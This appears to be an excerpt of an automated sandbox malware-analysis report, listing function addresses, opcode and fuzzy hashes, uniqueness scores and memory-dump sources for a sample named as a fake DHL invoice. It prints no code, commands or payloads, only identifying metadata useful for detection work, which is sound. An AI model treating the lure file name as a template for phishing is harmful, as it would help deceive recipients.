Opcode ID: 2db55117c50c5c63757913a1de513521c2ed3f7e3668bbaad464345479facdbe
Instruction ID: 954d891ae5a0f8a82d668f5b93438b3f31cf2a3ce3ff2d40abf6fb60562a3372
Opcode Fuzzy Hash: 2db55117c50c5c63757913a1de513521c2ed3f7e3668bbaad464345479facdbe
Instruction Fuzzy Hash: 3B01A271244701AFD732DF1AD844F16BAE8EF95B50F15482AB60E9F390D6B0A841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01942582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 303192a84379ac2701f251f59217d3401682c3bd12ad759a000a63d9994b6a29
Instruction ID: 5d93b2cc9e39a3e21b60ff8ec06940ca8e8221fc321ee771b47b9cffc9dd941c
Opcode Fuzzy Hash: 303192a84379ac2701f251f59217d3401682c3bd12ad759a000a63d9994b6a29
Instruction Fuzzy Hash: 75F0D632651710B7C731DB5A9C40F07BBADEBC4B90F014028BA0997600C630ED01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0196C073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: b6b4f5dac6f5627b3067a56065aee97a99c3b24ea6d99f8974b831773e996fb9
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: EBF0C2B2600611ABE325CF4DDC40E67FBEEDBD1A80F058128A549D7220EA31ED05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0193C310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: 3d657e040773749c3292d65be1f3a1b3cb090308b91f085b5437a8c1a719ae87
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: 23F0F633204E23ABDB32565D8840F2BAA998FD1BA5F1A0037E60DBB200CE709D0297D1

Uniqueness

Uniqueness Score: -1.00%

Function 0197CA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: 778a86316e885460aefbd1bfc78e16c31d9c6a0081e5427834a4261f5c71de7d
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 7101F432200A86DFDB26E71EC949F99BBDDEF95B51F0844A5FE0C9B6A1D678C900C311

Uniqueness

Uniqueness Score: -1.00%

Function 01A161E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b5d2f8dfba20c4ba8cbb4d870ecb41d07f9b0e9dc8e5857e3874f9c09d80ee
Instruction ID: 00ec358aa2d7a3e4ea9eb13b55bfe922b5b0f8b53808e5c158265361c6b7b126
Opcode Fuzzy Hash: e3b5d2f8dfba20c4ba8cbb4d870ecb41d07f9b0e9dc8e5857e3874f9c09d80ee
Instruction Fuzzy Hash: 5F014F71E012599BDB04DFA9D845AEEBBF8BF58710F14405AF905E7280D774EA02CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 019C63C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: f09691fbc0dbbecfcb64bf3abe109fe086d1a6b07c6350109edfc172ddc73807
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: 9CF01D7220001DBFEF019F95DD80DAF7B7EEB997D8B104129FA15A2160D631DE21ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 019CA4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e7d9c373e4f9cd8769edbd753bc0e6580a92f12c89789b9022df7748d29eee
Instruction ID: 41d757d190606ddb7f41c1c23d11e5ae1b43f647e84e7d56e139bf40bf5f8007
Opcode Fuzzy Hash: 90e7d9c373e4f9cd8769edbd753bc0e6580a92f12c89789b9022df7748d29eee
Instruction Fuzzy Hash: 2101893650024DABCF129E84DC40EDE7F66FB4CB54F058205FE1866220C332D971EB81

Uniqueness

Uniqueness Score: -1.00%

Function 0193C0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feafbf23d311970889b72a8ab61b343470bbc50ce8d21cfc7ad34b098f4179b5
Instruction ID: 2a535601c6a87e49d37866b70d111e87ea79122a66219c4821976fd0dbcde3fb
Opcode Fuzzy Hash: feafbf23d311970889b72a8ab61b343470bbc50ce8d21cfc7ad34b098f4179b5
Instruction Fuzzy Hash: 01F024723047425BF71496999C11F3273DAF7C0752F65806BEB0D9B2C5E970EC418394

Uniqueness

Uniqueness Score: -1.00%

Function 0197656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eeb03c2673e5a9bfeb452466fa372b67685e504edd9ad15c4190d4d9919b2b2
Instruction ID: 97ed0d97cb94c4e77999f7fcc2f4c9c0c6f7fe814cbe4e996ba0f5a66fa09683
Opcode Fuzzy Hash: 6eeb03c2673e5a9bfeb452466fa372b67685e504edd9ad15c4190d4d9919b2b2
Instruction Fuzzy Hash: F201A470601A82DFF322D72CCE48F6937A8BF80B40F480590BA0A9B6D6D728D501D614

Uniqueness

Uniqueness Score: -1.00%

Function 019E437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: 94a1d5ce69d713421e93fb194254a1fd8e26bae72cecb1c3244ff15e86c489a2
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 01F0E93538191357E777AE2DC928B2EA6DD9FD0942B15252C964DCB640DF20E80087A0

Uniqueness

Uniqueness Score: -1.00%

Function 019CC89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73cb50246d080ffd28603016ae9b415cc376b9a4fdfa112e2f4d5be2e8a01bb7
Instruction ID: b24695dfb95936b0559929e11abfcad60d63e577aed5c35a83c0b156162880da
Opcode Fuzzy Hash: 73cb50246d080ffd28603016ae9b415cc376b9a4fdfa112e2f4d5be2e8a01bb7
Instruction Fuzzy Hash: C7F0AF706053049FC310EF68C842A1BBBE4FF98750F40465EB89CDB390E634EA01CB96

Uniqueness

Uniqueness Score: -1.00%

Function 019CE872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: de0b3139ce88c6ea88b10147caf500e85f23ec16961e4c7a2fe09c3059c6c0d6
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 7CF05432B115119BD331DA4DCC80F17BB6CEFD5E60F590469AA4D9B260C760EC01C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 01970854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 5e2674df8a67906b37b2575553c26fab7c2c34504bc357d601e9d94a8ea8d51b
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: E4F024B2610204AFE314DB21CC05F86B6E9FF99300F188078A949D7260FAB1ED00C654

Uniqueness

Uniqueness Score: -1.00%

Function 019CC912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab0e14688fea0e64e175fa6a60b65f60cb31a97402c20dd9fa94162917e84a9
Instruction ID: 088fb0a147dfb27a7425105384d29c50f17c9db63b6fc99cbbf5e086122131ae
Opcode Fuzzy Hash: 7ab0e14688fea0e64e175fa6a60b65f60cb31a97402c20dd9fa94162917e84a9
Instruction Fuzzy Hash: 75F04F70A012499FCB04EFA9C515A9EBBB4EF58700F108159B959EB385DA34EA01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019447FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966f546dbef8f813be26df7ed3c8ab67cda03a1e3d12fcfc9b2f00e3de178cf6
Instruction ID: 7a62e5804e02fc1074567f450413a40d2a315b65c550f06d1a60572970b7f5f8
Opcode Fuzzy Hash: 966f546dbef8f813be26df7ed3c8ab67cda03a1e3d12fcfc9b2f00e3de178cf6
Instruction Fuzzy Hash: 8AF0BE319167E59FF732CB6CC144F61BBDC9B00622F08896AD98D87B42C735D880CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01A00115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5faff31c20e3b0892552a296a2a411511806b24511a2df245d386922d24b5f30
Instruction ID: 624fee2408938210621cd2b2bc1a5eb47f7f21d744d4c0023eafbd9dd60b5b52
Opcode Fuzzy Hash: 5faff31c20e3b0892552a296a2a411511806b24511a2df245d386922d24b5f30
Instruction Fuzzy Hash: 65F05C2F419BC026CF335B3C7EA03D16F65A781260F0A1089F5BCD7245C6748583C320

Uniqueness

Uniqueness Score: -1.00%

Function 0197C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9fa190f97f629837d434e408cc933644c301fde1cf88ce19831ff21b8932a0
Instruction ID: 2d3cf4a89e88dcecfba17cb2edd58ad124ee4ff7d17c7ca9900df889ec6ab18f
Opcode Fuzzy Hash: 8a9fa190f97f629837d434e408cc933644c301fde1cf88ce19831ff21b8932a0
Instruction Fuzzy Hash: ACF0E2B15116579FE322D71CC1C8B55BBDCAF447A2F099865D90E87552C360E880CA50

Uniqueness

Uniqueness Score: -1.00%

Function 01982619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 4dc5aaf116c4ac363edab185ff0b6952a5ab7d56effe4bf74a1ce96f29ab223e
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: 89E0D8723006412BE712AF598CC4F57776EDFD2B14F05007AB9085F252CAE2DC09C2A4

Uniqueness

Uniqueness Score: -1.00%

Function 019D6030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 90f82bec4a5c42421e2076e4f9be3d9a9e1abea3533501c2716f86688dc1dfd7
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: C4F03072154204AFE3218F4AD944F52BBF8EB45365F46C425E60D9B561D379EC40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01940710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 8caea3fc21dd38e91af3c100a8140f2b9bb6a2d70e2d5e9f1a8752b78e219d09
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: F7F0E5392043459BDB16DF1AC440ED57BA8FB41350B040454FD4A8B341E735EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019749D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: 92eb61ad409f21b7efa5651f318365f158e3f3b2b2841b017bc5ad11a9cf4083
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 9BE0D832654185ABD3267A598800F6A77A9DFD07A1F160429E60C9B162EB70DC40D7D8

Uniqueness

Uniqueness Score: -1.00%

Function 019E678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 2705b66f96e81d6d337b9b7bce13df160ded90d34bbfe8000a2c6b3a0c8638d2
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: B5E0D832640214BBDB229759CD05F9A7EBCDBA4E90F050055B604E7090D530EE00D690

Uniqueness

Uniqueness Score: -1.00%

Function 019425E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa14407a0246cf8b5d3c8f150281784d2e5a9d6ff1374dd6fb10e8d0a8dc54a4
Instruction ID: dadec67b3b6397616a40e4a689fa1a6e1fbe67ab136d146b781d9ea884188686
Opcode Fuzzy Hash: aa14407a0246cf8b5d3c8f150281784d2e5a9d6ff1374dd6fb10e8d0a8dc54a4
Instruction Fuzzy Hash: 91E09232100954ABC322FF29DD01F8A779AEFA07A0F014525B11957190CB30A910C794

Uniqueness

Uniqueness Score: -1.00%

Function 019FA456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: d534047f53909892689ea7c0ecd7267fbd7dd5bda39311f21aa92724f60bce0e
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: C2E09231010612EFE732AF2AC808B56BBE9BF90B52F148C2CA19E124B0C77598C0CB40

Uniqueness

Uniqueness Score: -1.00%

Function 019C4000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 684c45d67c3278a8a5dcc4f6e507938b3eed5c9a550809257d868e91208f2266
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 9FE0C2343403058FE715CF19C050B627BBABFD5A11F28C068A9888F205EB32E842CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0197CA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde021bbe232a91cb94080529d2dd2c1909ffd4918bb90faf8ab079f83c72755
Instruction ID: 7426ae33e9e69bb5cd7ac79988f260fbc50a28944f05fbc14e703900f3f6ec47
Opcode Fuzzy Hash: fde021bbe232a91cb94080529d2dd2c1909ffd4918bb90faf8ab079f83c72755
Instruction Fuzzy Hash: 52D02B324810627ACB7AF1187C04F933A5D9F80321F064860F50CA2021D564EC8193D4

Uniqueness

Uniqueness Score: -1.00%

Function 0193823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: 7750171b6987012134c246e5ddbc1591549ebe9c15152f391ff3a917697de007
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 79E08C32401A10EFDB322F29DC00F5276A9FBD4B91F214A29F08E160A886B4A881CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01942050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79cd9cbdde1663e2d939c0a2b4881cf593616fa944a0e1e006ebc2fe00b9763
Instruction ID: 4412125d242d7258e0563a33f9879c05976f111714f25606e50971e243ce10b6
Opcode Fuzzy Hash: f79cd9cbdde1663e2d939c0a2b4881cf593616fa944a0e1e006ebc2fe00b9763
Instruction Fuzzy Hash: 42E0C2321004506BC312FF5DED01F4A739EEFE47A0F000121F55897290CB20AD01C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 01978A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 8c45d3227d1bf5c642bb44b77d67973f24cc90153364efb0f3cd81086e84dbc9
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 18E08633511A1487C728EE18D515B7277A8EF45720F09463EA61747780C534E544C794

Uniqueness

Uniqueness Score: -1.00%

Function 01996AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: cb3ad914b1a6d0f5e207b902aa7728c77dd0ac88528d756acfe527aab5a53430
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 5BD05E36511A50AFC7329F1BEA00C13BBF9FBC5B51705062EA94983920C675A806CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00417312 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005aa1a9355414f3a12429ce7ab098b8187bb15b7130122fab01a4847116c164
Instruction ID: a85fa2c2e0ed940b7f3a1964a94cd656819bd7c32ecadaf81e60066b16622562
Opcode Fuzzy Hash: 005aa1a9355414f3a12429ce7ab098b8187bb15b7130122fab01a4847116c164
Instruction Fuzzy Hash: C5C08C37F5705CAACA20CE5D74811B4F330E683622F112AE2DD8CF30008813E05A4699

Uniqueness

Uniqueness Score: -1.00%

Function 0197E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: f9db0526eb8926f968e882347c88b930fbd02ebd635b0b9b014d0ad764d3543d
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: AED0A932A24620ABDB72AA1CFC00FC333E8BB88761F060459B508C7150C360AC81CA84

Uniqueness

Uniqueness Score: -1.00%

Function 019BE908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: c728f72d492782976e92a71c07e9f42f845facc783841515fbaac5d795ef5dd1
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: 09E0EC359506849BDF56DF99C680F9ABBB9FB94B40F150054A50C6B660C624A900CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0193A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
